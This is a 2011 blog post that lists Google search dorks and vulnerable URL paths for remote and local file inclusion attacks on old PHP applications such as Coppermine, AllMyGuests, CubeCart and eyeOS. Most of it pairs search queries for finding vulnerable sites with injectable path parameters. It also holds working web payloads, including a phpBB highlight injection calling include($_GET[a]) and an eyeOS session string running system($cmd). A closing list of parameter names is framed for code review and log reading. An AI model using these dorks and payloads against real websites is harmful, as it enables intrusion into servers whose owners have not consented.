Thursday, 28 April 2011

Dork List for RFI (Remote File Inclusion) and LFI (Local File Inclusion)


/modules/coppermine/themes/default/theme.php?THEME_DIR=


/modules/coppermine/include/init.inc.php?CPG_M_DIR=


/modules/coppermine/themes/coppercop/theme.php?THEME_DIR=


/coppermine/themes/maze/theme.php?THEME_DIR=


/allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=


/allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=


/myPHPCalendar/admin.php?cal_dir=


/agendax/addevent.inc.php?agendax_path=


/modules/mod_mainmenu.php?mosConfig_absolute_path=


/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=


/main.php?page=


/default.php?page=


/index.php?action=


/index1.php?p=


/index2.php?x=


/index2.php?content=


/index.php?conteudo=


/index.php?cat=


/include/new-visitor.inc.php?lvc_include_dir=


/modules/agendax/addevent.inc.php?agendax_path=


/shoutbox/expanded.php?conf=


/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=


/pivot/modules/module_db.php?pivot_path=


/library/editor/editor.php?root=


/library/lib.php?root=


/e107/e107_handlers/secure_img_render.php?p=


/zentrack/index.php?configFile=


/main.php?x=


/becommunity/community/index.php?pageurl=


/GradeMap/index.php?page=


/index4.php?body=


/side/index.php?side=


/main.php?page=


/es/index.php?action=


/index.php?sec=


/index.php?main=


/index.php?sec=


/index.php?menu=


/html/page.php?page=


/page.php?view=


/index.php?menu=


/main.php?view=


/index.php?page=


/content.php?page=


/main.php?page=


/index.php?x=


/main_site.php?page=


/index.php?L2=


/content.php?page=


/main.php?page=


/index.php?x=


/main_site.php?page=


/index.php?L2=


/index.php?show=


/tutorials/print.php?page=


/index.php?page=


/index.php?level=


/index.php?file=


/index.php?inter_url=


/index.php?page=


/index2.php?menu=


/index.php?level=


/index1.php?main=


/index1.php?nav=


/index1.php?link=


/index2.php?page=


/index.php?myContent=


/index.php?TWC=


/index.php?sec=


/index1.php?main=


/index2.php?page=


/index.php?babInstallPath=


/main.php?body=


/index.php?z=


/main.php?view=


/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=


/index.php?file=


/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=




1. allinurl:my_egallery site:.org
/modules/My_eGallery/public/displayCategory.php?basepath=


2. allinurl:xgallery site:.org
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=


3. allinurl:coppermine site:.org
/modules/coppermine/themes/default/theme.php?THEME_DIR=


4. allinurl:4nAlbum site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=


5. allinurlP:NphpBB2 site:.org
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=


6. allinurl:ihm.php?p=


7. Keyword : "powered by AllMyLinks"
/include/footer.inc.php?_AMLconfig[cfg_serverpath]=


8. allinurl:/modules.php?name=allmyguests
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


9. allinurl:/Popper/index.php?
/Popper/index.php?childwindow.inc.php?form=


10. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
yahoo = by Kietu? v 3.2
/kietu/index.php?kietu[url_hit]=


11. keyword : "Powered by phpBB 2.0.6"
/html&highlight=%2527.include($_GET[a]),exit.%2527&a=


12. keyword : "powered by CubeCart 3.0.6"
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=


13. keyword : "powered by paBugs 2.0 Beta 3"
/class.mysql.php?path_to_bt_dir=


14. allinurl:"powered by AshNews", allinurl:AshNews atau allinurl: /ashnews.php
/ashnews.php?pathtoashnews=


15. keyword : /phorum/login.php
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=


16. allinurl:ihm.php?p=*


14. keyword : "powered eyeOs"
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cm d=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions. eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5 beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5b a%5d);&a=


15. allinurl:.php?bodyfile=


16. allinurl:/includes/orderSuccess.inc.php?glob=
/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=


17. allinurl:forums.html
/modules.php?name=


18. allinurl:/default.php?page=home


19. allinurl:/folder.php?id=


20. allinurl:main.php?pagina=
/paginedinamiche/main.php?pagina=


21. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( "powered by AllMyGuests")
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


22. allinurl:application.php?base_path=
/application.php?base_path=


23. allinurlp:hplivehelper
/phplivehelper/initiate.php?abs_path=


24. allinurlp:hpnuke
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=


25. key word : "powered by Fantastic News v2.1.2"
/archive.php?CONFIG[script_path]=


26. keyword: "powered by smartblog" AND inurl:?page=login
/index.php?page=


27. allinurl:/forum/
/forum/admin/index.php?inc_conf=


28. keyword:"Powered By FusionPHP"
/templates/headline_temp.php?nst_inc=


29. allinurl:shoutbox/expanded.php filetypep:hp
/shoutbox/expanded.php?conf=


30. allinurl: /osticket/
/osticket/include/main.php?config[search_disp]=true&include_dir=


31. keyword : "Powered by iUser"
/common.php?include_path=


32. allinurl: "static.php?load="
/static.php?load=


33. keyword : /phpcoin/login.php
/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=


34. keyword: allinurl:/phpGedview/login.php site:
/help_text_vars.php?dir&PGV_BASE_DIRECTORY=


35. allinurl:/folder.php?id=
/classes.php?LOCAL_PATH=


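LFI (Local File Inclusion)

Request parameter names that often carry a file or page name into a PHP include; these are the names to check in code review and when reading web server access logs: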


acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user=
